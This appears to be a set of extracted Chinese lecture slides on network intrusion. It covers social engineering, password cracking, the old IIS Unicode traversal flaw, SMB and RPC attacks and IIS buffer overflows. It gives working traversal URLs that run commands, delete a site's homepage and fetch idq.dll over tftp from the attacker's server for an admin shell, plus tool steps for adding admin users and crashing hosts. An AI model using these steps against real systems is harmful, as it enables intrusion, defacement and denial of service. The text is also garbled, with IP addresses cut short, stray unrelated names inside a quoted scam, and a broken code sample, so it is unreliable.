第7讲网络入侵

第7讲网络入侵内容提要社会工程学攻击物理攻击暴力攻击利用Unicode漏洞攻击利用缓冲区溢出漏洞进行攻击等技术。并结合实际，介绍流行的攻击工具的使用以及部分工具的代码实现。社会工程学攻击社会工程学是使用计谋和假情报去获得密码和其他敏感信息的科学。或者说是一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段，取得自身利益的手法，近年来已成迅速上升甚至滥用的趋势。研究一个站点的策略其中之一就是尽可能多的了解这个组织的个体，因此黑客不断试图寻找更加精妙的方法从，他们希望渗透的组织那里获得信息社会工程学攻击举个例子：一组高中学生曾经想要入侵某公司的网络，他们拟定了一个表格，调查看上去显得是无害的个人信息，例如所有秘书和行政人员和他们的配偶、孩子的名字。这些从学生转变成的黑客说这种简单的调查是他们社会研究工作的一部分。利用这份表格这些学生能够快速的进入系统，因为网络上的大多数人是使用宠物和他们配偶名字作为密码。社会工程学攻击1、打电话请求密码

尽管不像前面讨论的策略那样聪明，打电话寻问密码也经常奏效。在社会工程中那些黑客冒充失去密码的合法雇员，经常通过这种简单的方法重新获得密码。2、伪造Email一个黑客使用telnet可以截取任何一个身份证发送Email的全部信息，这样的Email消息是真的，因为它发自于一个合法的用户。在这种情形下这些信息显得是绝对的真实。黑客可以伪造这些。一个冒充系统管理员或经理的黑客就能较为轻松的获得大量的信息，黑客就能实施他们的恶意阴谋。社会工程学攻击举例1、请狼入室李小姐是某个大公司的经理秘书，她工作的电脑上存储着公司的许多重要业务资料，所以属于公司着重保护的对象，安全部门设置了层层安全防护措施，可以说，她的电脑要从外部攻破是根本不可能的事情。为了方便修改设置和查杀病毒，安全部门可以直接通过网络服务终端对李小姐的电脑进行全面设置。也许贪图方便，维护员与李小姐的日常联系是通过QQ进行的。这天，李小姐刚打开QQ，就收到维护员的消息：“小李，我忘记登录密码了，快告诉我，有个紧急的安全设置要做呢！”因为和维护员很熟了，李小姐就把密码发了过去。。。。一夜之间，公司的主要竞争对手掌握了公司的业务！社会工程学攻击举例由于安全部门距离李小姐的工作地点有好些距离，管理不方便，所以公司让他们直接通过网络来管理机器！他与李小姐之间的联系通过QQ进行。问题偏偏就出在QQ上。作为安全人员，他自然知道密码的重要性，因此他的任何密码都设置得十分复杂，穷举几乎不可能。至于被入侵，那更不可能发生。然而百密仍有一疏，他做梦也没想到对手利用QQ的取回密码功能轻易拿到了他的密码。剖析：

李小姐正是出于对维护员的信任才被对方欺骗的。因为那个在QQ上出现的维护员根本不是公司的维护员本人，而是对手盗取了维护员的QQ，再利用一个小小的信任关系，就轻易取得了登录密码。2、形同虚设的密码社会工程学攻击举例剖析：他在输入提示答案的时候，下意识地输入了心里最重要的那个人的名字。但是对手也知道他心里那个人的名字，所谓的“知己知彼”小马绚丽的QQ秀和一些特色服务，但舍不得花钱。好想有免费的Q币。某天一QQ好友给他发来一个URL，还说这个网站通过一定的点击次数提供Q币。如此好的机会小马怎能放过？他根据网站的提示输入了QQ号码和密码完成注册，然后给QQ上的朋友们发了网址。然而等了许久，自己的Q币依然没有动静。第二天，小马想登录QQ时，却发现怎么也登录不上去了——QQ密码被人改了。这是最近闹得轰轰烈烈的QQ欺骗案件之一。3、E时代的守株待兔社会工程学攻击举例大哥你是不是太搞笑？！改我密码还要5分钟啊？麻烦你快一点好不好！还有QQ中奖要求用户填写密码以待“验证”等伎俩，无论什么手法，最终结局都是一样的，那就是——用户的密码被人改掉。如此白痴的骗局，只要有点常识的人都不难理解其中的“笑话”，奇怪的是却屡屡有人上当，究其原因，就是因为国人的贪小便宜心理作祟。剖析：这就是著名的“网络钓鱼”！论坛常有帖子：“……腾讯公司预留了专用号码作为充值号，此号是自动读取指令的，为了不引起大家的注意，所以这个QQ比较普通，这个QQ一般隐身。只要发送{Jerusalum/PLO号码}{Vesselin

Bontchev密码}{FRALDMUZKQ币数量}，然后下线5分钟，等着收Q币吧。”社会工程学攻击举例王先生是一家银行的职员，通常都是直接在网络上完成转账操作的。由于他的电脑水平不高，前不久被一个初学者骇客入侵了机器。在请来专业人员修复系统更改密码后，王先生照例登录网络银行为手机缴费，可是才过一会儿他的冷汗就出来了：网络银行登录不进去了！深感大事不妙的王先生去银行办理了相关手续，查账发现账户里的钱已经被人划走了。因为王先生犯了大部分人都会犯的致命错误：通常为了记忆方便，人们会把几处的密码都设置成一样的，例如QQ、E-MAIL、FTP、网站等的密码，而王先生更进一步把所有密码都弄成一样的了，因此入侵者在得到王先生的机器登录密码后也就得到了网络银行的密码。正是因为这个普遍心理特点，受害者往往都是被入侵者一锅端了！因为简单密码和相同密码是大部分人都会碰到的心理弱点4、轻而易举的入侵物理攻击与防范物理安全是保护一些比较重要的设备不被接触。物理安全比较难防，因为攻击往往来自能够接触到物理设备的用户。例5-1得到管理员密码用户登录以后，所有的用户信息都存储在系统的进程，winlogon.exe中。可用FindPass等工具对该进程进行解码。将它放到C:\后执行该程序，将得到当前用户得登录名！权限提升有时候，管理员为了安全，给其他用户建立一个普通用户帐号，认为这样就安全了。其实不然，用普通用户帐号登录后，可以利用工具GetAdmin.exe将自己加到管理员组或者新建一个具有管理员权限的用户。普通用户建立管理员帐号输入一个用户名如：IAMHacker，点击"确定"后，然后点击主窗口"OK"，出现添加成功的窗口。暴力攻击暴力攻击的一个具体例子是，一个黑客试图使用计算机和信息去破解一个密码。一个黑客需要破解—段单一的被用非对称密钥加密的信息，为了破解这种算法，一个黑客需要求助于非常精密复杂的方法，它使用120个工作站，两个超级计算机利用从三个主要的研究中心获得的信息，即使拥有这种配备，它也将花掉八天的时间去破解加密算法，实际上破解加密过程八天已是非常短暂的时间了。字典文件一次字典攻击能否成功，很大因素上决定与字典文件。一个好的字典文件可以高效快速的得到系统的密码。攻击不同的公司、不通地域的计算机，可以根据公司管理员的姓氏以及家人的生日，可以作为字典文件的一部分，公司以及部门的简称一般也可以作为字典文件的一部分，这样可以大大的提高破解效率。一个字典文件本身就是一个标准的文本文件，其中的每一行就代表一个可能的密码。目前有很多工具软件专门来创建字典文件。暴力破解操作系统密码字典文件为暴力破解提供了一条捷径，程序首先通过扫描得到系统的用户，然后利用字典中每一个密码来登录系统，看是否成功，如果成功则将密码显示.比如使用字典文件，利用GetNTUser依然可以将管理员密码破解出来.暴力破解邮箱密码邮箱的密码一般需要设置到八位以上，否则七位以下的密码容易被破解。尤其七位全部是数字，更容易被破解。黑雨——POP3邮箱密码暴力破解器.暴力破解软件密码目前许多软件都具有加密的功能，比如Office文档、Winzip文档和WinRaR文档等等。这些文档密码可以有效的防止文档被他人使用和阅读。但是如果密码位数不够长的话，同样容易被破解。破解Word文档密码AdvancedOfficeXPPasswordRecovery可以快速破解Word文档密码。破解Word文档密码设置密码长度最短是一位，最长是三位，点击工具栏开始的图标，开始破解密码，大约两秒钟后，密码被破解了。Unicode漏洞专题通过打操作系统的补丁程序，就可以消除漏洞。只要是针对漏洞进行攻击的案例都依赖于操作系统是否打了相关的补丁。Unicode漏洞是2000-10-17发现的，受影响的版本：MicrosoftIIS5.0+MicrosoftWin2K系列版本MicrosoftIIS4.0+WindowsNT4.0消除该漏洞的方式是安装操作系统的补丁，只要安装了SP1以后，该漏洞就不存在了。微软IIS4.0和5.0都存在利用扩展UNICODE字符取代"/"和"\"而能利用"../"目录遍历的漏洞。Unicode漏洞的检测方法使用扫描工具X-Scan来检测Unicode漏洞是否存在。目标主机IP为：09，Unicode漏洞属于IIS漏洞，所以这里只扫描IIS漏洞就可以了，X-Scan设置。Unicode漏洞的检测方法将主机添加到目标地址，扫描结果如图。Unicode漏洞的检测方法只要是/scripts开头的漏洞都是Unicode漏洞。比如：/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir其中/scripts目录是IIS提供的可以执行命令的一个有执行程序权限的一个目录Unicode漏洞的检测方法scripts目录一般系统盘根目录下的Inetpub目录下Unicode漏洞的检测方法在Windows的目录中，可以使用“../”来访问上一级目录在浏览器中利用“scripts/../../”可以访问到系统盘根目录，访问“scripts/../../winnt/system32”就访问到系统的system32了，在system32目录下包含许多重要的系统文件，比如cmd、net命令，可以利用该文件新建用户，删除文件等操作。浏览器地址栏中禁用符号“../”，但是可以使用符号“/”的Unicode的编码。比如“/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode编码。这条语句是执行dir命令列出目录结构。Unicode漏洞此漏洞从中文IIS4.0+SP6开始，还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1，台湾繁体中文也同样存在这样的漏洞。在NT4中/编码为“%c1%9c”或者“%c1%9c”，WIN2000英文版是“%c0%af”。但从国外某些站点得来的资料显示，还有以下的编码可以实现对该漏洞的检测，该编码存在于日文版、韩文版等操作系统。%c1%pc

%c0%9v

%c0%qf

%c1%8s

%e0%80%af利用漏洞读取系统盘目录利用该漏洞读取出计算机上目录列表，比读取C盘的目录：09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\利用漏洞读取系统盘目录利用语句得到对方计算机上装了几个操作系统以及操作系统的类型，只要读取C盘下的boot.ini文件就可以了。09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+type+c:\boot.ini利用漏洞删除主页利用Unicode可以方便的更改对方的主页，若对方网站的根路径在“C:\Initpub\wwwroot”（系统默认）下，可以删除该路径下的文件“default.asp”来删除主页，这里的“default.asp”文件是IIS的默认启动页面。使用的语句是：09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+del+c:\inetpub\wwwroot\default.asp利用漏洞删除主页拷贝文件将cmd.exe文件拷贝到scripts目录，并改名为c.exe：09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+c.exe查看C盘的目录以后使用cmd.exe命令就方便了，比如查看C盘的目录，使用的语句就可以简化为：09/scripts/c.exe?/c+dir+c:\利用漏洞入侵系统在地址栏上执行命令，用户的权限比较低，像net等系统管理指令不能执行。利用Unicode可以入侵对方的系统，并得到管理员权限。首先需要向对方服务器上传一些文件，入侵的第一步，建立tftp服务器，向对方的scripts文件夹传几个文件。需要上传一个名为“idq.dll”的文件，为了上传这个文件，首先在本地计算机上搭建一个TFTP服务器，它一般用来传输单个文件。使用工具软件tftpd32.exe建立服务器。将idq.dll和tftpd32.exe放在本地的同一目录下，执行tftpd32.exe程序。利用漏洞入侵系统利用漏洞入侵系统在本地的TFTP的服务器就建立好了，保留这个窗口，通过该服务器向对方传递idq.dll文件。在浏览器中执行命令：“09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+10+get+idq.dll”，命令其实是“tftp–i10getidq.dll”意思是从10服务器上获取idq.dll文件上载文件并查看成果入侵对方主机拷贝ispc.exe到本地计算机的C:\，在命令行下执行：“ispc.exe09/scripts/idq.dll”，连接成功后就直接进入了对方的DOS命令行下，而且具有管理员权限。建立用户可以在对方计算机上做管理员可以做的一切事情，比如添加用户。建立用户名：Hacker123，密码：Hacker123利用打印漏洞攻击利用打印漏洞可以在目标的计算机上添加一个具有管理员权限的用户（用户名与密码均为：hax）。经过测试，该漏洞在SP2、SP3以及SP4版本上依然存在，但是不能保证100%入侵成功。工具：cniis.exe，格式是：cniis090参数1：是目标的IP地址，参数2：目标系统的补丁号因为09没有打补丁，这里就是0。SMB致命攻击SMB（SessionMessageBlock，会话消息块协议）又叫做NetBIOS或LanManager协议，用于不同计算机之间文件、打印机、串口和通讯的共享和用于Windows平台上提供磁盘和打印机的共享。SMB协议版本有很多种，在Windows98、WindowsNT、Windows2000和XP使用的是NTLM0.12版本。利用该协议可以进行各方面的攻击，比如可以抓取其他用户访问自己计算机共享目录的SMB会话包，然后利用SMB会话包登录对方的计算机。下面介绍利用SMB协议让对方操作系统系统重新启动或者蓝屏。致命攻击使用的工具软件是：SMBDieV1.0，该软件对打了SP3、SP4的计算机依然有效，必须打专门的SMB补丁.攻击需要两个参数：对方的IP地址和对方的机器名致命攻击然后再点按钮“Kill”，如果参数输入没有错误的话，对方计算机立刻重启或蓝屏，命中率几乎100%缓冲区溢出攻击目前最流行的一种攻击技术就是缓冲区溢出攻击。当目标操作系统收到了超过了它的最大能接收的信息量的时候，将发生缓冲区溢出。这些多余的数据将使程序的缓冲区溢出，然后覆盖了实际的程序数据，缓冲区溢出使目标系统的程序被修改，经过这种修改的结果使在系统上产生一个后门。这项攻击对技术要求比较高，但是攻击的过程却非常简单。缓冲区溢出原理很简单，比如程序：缓冲区溢出攻击voidfunction(char*szPara1){ charbuff[16];

strcpy(buffer,szPara1);}程序中利用strcpy函数将szPara1中的内容拷贝到buff中，只要szPara1的长度大于16，就会造成缓冲区溢出。存在strcpy函数这样问题的C语言函数还有：strcat()、gets()、scanf()等。RPC漏洞溢出远程过程调用RPC（RemoteProcedureCall)，是操作系统的一种消息传递功能，允许应用程序呼叫网络上的计算机。当系统启动的时候，自动加载RPC服务。可以在服务列表中看到系统的RPC服务，如图。用RPC漏洞建立超级用户RPC溢出漏洞，对SP4也适用，必须打专用补丁。利用工具scanms.exe文件检测RPC漏洞，该工具是ISS安全公司2003年7月30日发布的，运行在命令行下用来检测指定IP地址范围内机器是否已经安装了“DCOMRPC接口远程缓冲区溢出漏洞（823980-MS03-026）”补丁程序。如果没有安装补丁程序，该IP地址就会显示出“[VULN]”。首先拷贝该文件到C盘根目录，现在要检查地址段09到10的主机，执行命令“scanms.exe09-10”检查缓冲区溢出漏洞利用工具软件attack.exe对09进行攻击。攻击的结果将在对方计算机上建立一个具有管理员权限的用户，并终止了对方的RPC服务。新建用户的用户名和密码都是qing10，这样就可以登录对方计算机了，RPC服务停止操作系统将有许多功能不能使用，非常容易被管理员发现，可用OpenRpcSs来给对方重启RPC服务。攻击的全过程利用IIS溢出进行攻击1、利用软件SnakeIIS溢出工具可以让对方的IIS溢出，还可以捆绑执行的命令和在对方计算机上开辟端口。2、它适用于各类操作系统，如对09进行攻击，其系统为Win2K，没有安装补丁程序，攻击完毕后，开辟一个813端口，并在对方计算机上执行命令“dirc:\。3、点击按钮“IDQ溢出”，出现攻击成功的提示框利用IIS溢出进行攻击利用IIS溢出进行攻击现813端口已经开放，可用nc.exe连接到该端口，将会自动执行刚才发送的命令“dirc:\